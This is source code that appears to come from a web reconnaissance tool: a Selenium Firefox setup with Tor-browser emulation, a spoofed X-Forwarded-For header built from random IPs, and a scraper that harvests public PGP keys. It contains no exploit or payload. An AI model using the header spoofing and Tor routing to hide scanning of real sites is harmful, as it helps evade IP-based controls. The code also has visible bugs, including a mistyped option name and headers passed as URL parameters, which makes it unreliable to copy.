12 | )
13 |
14 |
15 | class SetBrowser(object):
16 |
17 | """
18 | set the Firefox browser settings
19 | """
20 |
21 | def __init__(self, **kwargs):
22 | self.agent = kwargs.get("agent", DEFAULT_USER_AGENT)
23 | self.proxy = kwargs.get("proxy", None)
24 | self.xforward = kwargs.get("xforward", False)
25 | self.tor = kwargs.get("tor", False)
26 | self.tor_port = kwargs.get("port", 9050)
27 |
28 | def __set_proxy(self):
29 | """
30 | set the browser proxy settings
31 | """
32 | if not self.tor and self.proxy is not None:
33 | proxy_type = self.proxy.keys()
34 | proxy_to_use = Proxy({
35 | "proxyType": ProxyType.MANUAL,
36 | "httpProxy": self.proxy[proxy_type[0]],
37 | "ftpProxy": self.proxy[proxy_type[0]],
38 | "sslProxy": self.proxy[proxy_type[0]],
39 | "noProxy": ""
40 | })
41 | return proxy_to_use
42 | else:
43 | return None
44 |
45 | def __tor_browser_emulation(self, ff_browser):
46 | """
47 | set the Firefox browser settings to mimic the Tor browser
48 | """
49 | preferences = {
50 | "privacy": [
51 | # set the privacy settings
52 | ("places.history.enabled", False),
53 | ("privacy.clearOnShutdown.offlineApps", True),
54 | ("privacy.clearOnShutdown.passwords", True),
55 | ("privacy.clearOnShutdown.siteSettings", True),
56 | ("privacy.sanitize.sanitizeOnShutdown", True),
57 | ("signon.rememberSignons", False),
58 | ("network.cookie.lifetimePolicy", 2),
59 | ("network.dns.disablePrefetch", True),
60 | ("network.http.sendRefererHeader", 0)
61 | ],
62 | "proxy": [
63 | # set the proxy settings
64 | ("network.proxy.type", 1),
65 | ("network.proxy.socks_version", 5),
66 | ("network.proxy.socks", '127.0.0.1'),
67 | ("network.proxy.socks_port", self.tor_port),
68 | ("network.proxy.socks_remote_dns", True)
69 | ],
70 | "javascript": [
71 | # disabled the javascript settings
72 | ("javascript.enabled", False)
73 | ],
74 | "download": [
75 | # get a speed increase by not downloading the images
76 | ("permissions.default.image", 2)
77 | ],
78 | "user-agent": [
79 | # set the user agent settings
80 | ("general.useragent.override", self.agent)
81 | ]
82 | }
83 | for preference in preferences.iterkeys():
84 | for setting in preferences[preference]:
85 | ff_browser.set_preference(setting[0], setting[1])
86 | return ff_browser
87 |
88 | def __set_x_forward(self, profile):
89 | """
90 | set the X-Forwarded-For headers for selenium, this can only be done
91 | if you are using a profile for Firefox, and ONLY IN FIREFOX.
92 | """
93 | ip_list = (
94 | create_random_ip(),
95 | create_random_ip(),
96 | create_random_ip()
97 | )
98 | # references:
99 | # https://eveningsamurai.wordpress.com/2013/11/21/changing-http-headers-for-a-selenium-webdriver-request/
100 | # https://stackoverflow.com/questions/6478672/how-to-send-an-http-requestheader-using-selenium-2/22238398#22238398
101 | # https://blog.giantgeek.com/?p=1455
102 |
103 | # amount of headers to modify
104 | profile.set_preference("modifyheaders.headers.count", 1)
105 | # action to take on the headers
106 | profile.set_preference("modifyheaders.headers.action0", "Add")
107 | # header name, in this case it's `X-Forwarded-For`
108 | profile.set_preference("modifyheaders.headers.name0", HTTP_HEADER.X_FORWARDED_FOR)
109 | # header value, in this case, it's 3 random IP addresses
110 | profile.set_preference("modifyheaders.headers.value0", "{}, {}, {}".format(
111 | ip_list[0], ip_list[1], ip_list[2]
112 | ))
113 | # enable the header modification
114 | profile.set_preference("modifyheaders.headers.enabled0", True)
115 | # send it through the configuration
116 | profile.set_preference("modifyheaders.config.active", True)
117 | # turn it on from the new configuration
118 | profile.set_preference("modifyheaders.config.alwaysOn", True)
119 | # as always, change the user agent
120 | profile.set_preference("general.useragent.override", self.agent)
121 | return profile
122 |
123 | def set_browser(self):
124 | """
125 | set the browser settings
126 | """
127 | profile = webdriver.FirefoxProfile()
128 | try:
129 | if not self.tor:
130 | logger.info(set_color(
131 | "setting the browser"
132 | ))
133 | profile.set_preference("general.useragent.override", self.agent)
134 | browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
135 | elif self.xforward:
136 | profile = self.__set_x_forward(profile)
137 | browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
138 | else:
139 | logger.info(set_color(
140 | "setting the Tor browser emulation"
141 | ))
142 | profile = self.__tor_browser_emulation(profile)
143 | browser = webdriver.Firefox(profile)
144 | except (OSError, WebDriverException):
145 | if not self.tor:
146 | profile.set_preference("general.useragent.override", self.agent)
147 | browser = webdriver.Firefox(profile, proxy=self.__set_proxy(),
148 | executable_path=whichcraft.which("geckodriver"))
149 | elif self.xforward:
150 | profile = self.__set_x_forward(profile)
151 | browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
152 | else:
153 | profile = self.__tor_browser_emulation(profile)
154 | browser = webdriver.Firefox(profile, executable_path=whichcraft.which("geckodriver"))
155 | return browser
156 |
--------------------------------------------------------------------------------
/var/search/pgp_search.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import requests
4 | from bs4 import BeautifulSoup
5 | from requests.exceptions import ReadTimeout
6 |
7 | import lib.core.common
8 | import lib.core.settings
9 |
10 |
11 | def __create_url(ext):
12 | """
13 | create the URL with the identifier, usually a hash
14 | """
15 | url = lib.core.settings.AUTHORIZED_SEARCH_ENGINES["pgp"]
16 | items = url.split("/")
17 | # make sure that there's a `/` in the extension
18 | if "/" in ext[0]:
19 | retval = "{}//{}{}".format(items[0], items[2], ext)
20 | else:
21 | # otherwise we'll just add it
22 | retval = "{}//{}/{}".format(items[0], items[2], ext)
23 | return retval
24 |
25 |
26 | def __set_headers(**kwargs):
27 | """
28 | set the HTTP headers
29 | """
30 | agent = kwargs.get("agent", None)
31 | xforward = kwargs.get("xforward", False)
32 | if not xforward:
33 | headers = {
34 | lib.core.common.HTTP_HEADER.CONNECTION: "close",
35 | lib.core.common.HTTP_HEADER.USER_AGENT: agent
36 | }
37 | else:
38 | ip_list = (
39 | lib.core.settings.create_random_ip(),
40 | lib.core.settings.create_random_ip(),
41 | lib.core.settings.create_random_ip()
42 | )
43 | headers = {
44 | lib.core.common.HTTP_HEADER.CONNECTION: "close",
45 | lib.core.common.HTTP_HEADER.USER_AGENT: agent,
46 | lib.core.common.HTTP_HEADER.X_FORWARDED_FOR: "{}, {}, {}".format(
47 | ip_list[0], ip_list[1], ip_list[2]
48 | )
49 | }
50 | return headers
51 |
52 |
53 | def obtain_html(url, query, **kwargs):
54 | """
55 | obtain the HTML containing the URL redirects to the public PGP keys
56 | """
57 | agent = kwargs.get("agent", None)
58 | xforward = kwargs.get("xforwad", False)
59 | proxy = kwargs.get("proxy", None)
60 | url = url.format(query)
61 | # regular expression to match if no results are given
62 | result_regex = re.compile("<.+>no.results.found<.+.>", re.I)
63 | req = requests.get(
64 | url,
65 | params=__set_headers(agent=agent, xforward=xforward), # set the headers
66 | proxies=lib.core.settings.proxy_string_to_dict(proxy),
67 | timeout=10
68 | )
69 | status, html = req.status_code, req.content
70 | if status == 200:
71 | # check against the regex
72 | if result_regex.search(str(html)) is not None:
73 | return None
74 | else:
75 | return html
76 | return None
77 |
78 |
79 | def gather_urls(html, attribute="a", descriptor="href"):
80 | """
81 | get the URLs within the HTML
82 | """
83 | redirects, retval = set(), set()
84 | soup = BeautifulSoup(html, "html.parser")
85 | for link in soup.findAll(attribute):
86 | found_redirect = str(link.get(descriptor)).decode("unicode_escape")
87 | if lib.core.settings.PGP_IDENTIFIER_REGEX.search(found_redirect) is not None:
88 | redirects.add(found_redirect)
89 | for link in redirects:
90 | url = __create_url(link)
91 | if lib.core.settings.URL_REGEX.match(url):
92 | retval.add(url)
93 | return list(retval)
94 |
95 |
96 | def get_pgp_keys(url_list, query, attribute="pre", **kwargs):
97 | """
98 | get the PGP keys by connecting to the URLs and pulling the information from the HTML
99 | """
100 | agent = kwargs.get("agent", None)
101 | proxy = kwargs.get("proxy", None)
102 | xforward = kwargs.get("xforward", None)
103 | verbose = kwargs.get("verbose", False)
104 | amount_to_search = kwargs.get("search_amount", 75) # TODO:/ add a way to increase this
105 |
106 | data_sep = "-" * 30
107 | extracted_keys, identifiers = set(), []
108 | # regex to match the beginning of a PGP key
109 | identity_matcher = re.compile(r"\bbegin.pgp.public.key.block", re.I)
110 | amount_left = len(url_list)
111 | lib.core.settings.logger.info(lib.core.settings.set_color(
112 | "checking a maximum of {} PGP keys".format(amount_to_search)
113 | ))
114 | for i, url in enumerate(url_list, start=1):
115 | if i >= amount_to_search:
116 | break
117 | if verbose:
118 | lib.core.settings.logger.debug(lib.core.settings.set_color(
119 | "checking '{}'".format(url), level=10
120 | ))
121 | if i % 25 == 0:
122 | lib.core.settings.logger.info(lib.core.settings.set_color(
123 | "currently checking PGP key #{}, {} left to check ({} total found)".format(
124 | i, amount_to_search - i, amount_left
125 | )
126 | ))
127 | identifiers.append(lib.core.settings.PGP_IDENTIFIER_REGEX.search(str(url)).group())
128 | try:
129 | req = requests.get(
130 | url,
131 | params=__set_headers(agent=agent, xforward=xforward),
132 | proxies=lib.core.settings.proxy_string_to_dict(proxy),
133 | timeout=10
134 | )
135 | status, html = req.status_code, req.content
136 | if status == 200:
137 | soup = BeautifulSoup(html, "html.parser")
138 | context = soup.findAll(attribute)[0]
139 | if identity_matcher.search(str(context)) is not None:
140 | extracted_keys.add(context)
141 | except ReadTimeout:
142 | lib.core.settings.logger.error(lib.core.settings.set_color(
143 | "PGP key failed connection, assuming no good and skipping", level=40
144 | ))
145 | for i, k in enumerate(extracted_keys):
146 | pgp_key = str(k).split("<{}>".format(attribute)) # split the string by the tag
147 | pgp_key = pgp_key[1].split("{}>".format(attribute))[0] # split it again by the end tag
148 | if verbose:
149 | lib.core.settings.logger.debug(lib.core.settings.set_color(
150 | "found PGP:", level=10
151 | ))
152 | # output the found PGP key if you run in verbose
153 | print("{}\n{}\n{}".format(data_sep, pgp_key, data_sep))
154 | lib.core.common.write_to_log_file(
155 | pgp_key, lib.core.settings.PGP_KEYS_FILE_PATH, lib.core.settings.PGP_KEY_FILENAME.format(identifiers[i], query)
156 | )
157 |
158 |
159 | def pgp_main(query, verbose=False):
160 | try:
161 | try:
162 | query = lib.core.settings.replace_http(query, queries=False, complete=True).split(".")[0]
163 | # make sure the query isn't going to fail
164 | except Exception:
165 | query = query
166 | lib.core.settings.logger.info(lib.core.settings.set_color(
167 | "searching public PGP files with given query '{}'".format(query)
168 | ))
169 | try:
170 | html = obtain_html(
171 | lib.core.settings.AUTHORIZED_SEARCH_ENGINES["pgp"], query, agent=lib.core.settings.DEFAULT_USER_AGENT
172 | )
173 | except (Exception, ReadTimeout):
174 | lib.core.settings.logger.warning(lib.core.settings.set_color(
175 | "connection failed, assuming no PGP keys", level=30
176 | ))
177 | html = None
178 | if html is not None:
179 | urls = gather_urls(html)
180 | lib.core.settings.logger.info(lib.core.settings.set_color(
181 | "found a total of {} URLs".format(len(urls))
182 | ))
183 | if verbose:
184 | lib.core.settings.logger.debug(lib.core.settings.set_color(
185 | "found a '{}'".format(urls), level=10
186 | ))
187 | lib.core.settings.logger.info(lib.core.settings.set_color(
188 | "gathering PGP key(s) and writing to a file", level=25
189 | ))
190 | return get_pgp_keys(urls, query, verbose=verbose)
191 | else:
192 | lib.core.settings.logger.warning(lib.core.settings.set_color(
193 | "did not find anything using query '{}'".format(query), level=30
194 | ))
195 | except KeyboardInterrupt:
196 | if not lib.core.common.pause():
197 | lib.core.common.shutdown()
--------------------------------------------------------------------------------